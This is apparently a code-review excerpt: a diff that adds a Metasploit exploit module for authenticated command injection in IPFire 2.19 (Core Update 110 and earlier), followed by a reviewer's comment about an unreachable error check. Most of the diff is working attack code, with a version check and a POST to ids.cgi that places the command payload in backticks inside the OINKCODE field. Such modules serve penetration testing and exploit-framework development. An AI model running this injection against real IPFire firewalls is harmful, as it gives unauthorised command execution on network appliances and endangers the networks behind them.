modules/exploits/linux/http/ipfire_oinkcode_exec.rb

```diff
@@ -0,0 +1,116 @@
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 09 2016'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
+      res = send_request_cgi(
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i <= 110
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/ids.cgi',
+        'method'        => 'POST',
+        'ctype'         => 'application/x-www-form-urlencoded',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+        'headers'       =>
+          {
+            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+          },
+        'vars_post'          => {
+            'ENABLE_SNORT_GREEN' => 'on',
+            'ENABLE_SNORT' => 'on',
+            'RULES' => 'registered',
+            'OINKCODE' => "`#{payload.encoded}`",
+            'ACTION' => 'Download new ruleset',
+            'ACTION2' => 'snort'
+          },
+      )
+
+      # success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
```

Comment:
This line is conditional on `if res.nil?` - however it's located inside a `if res` conditional. As such, it will never be executed.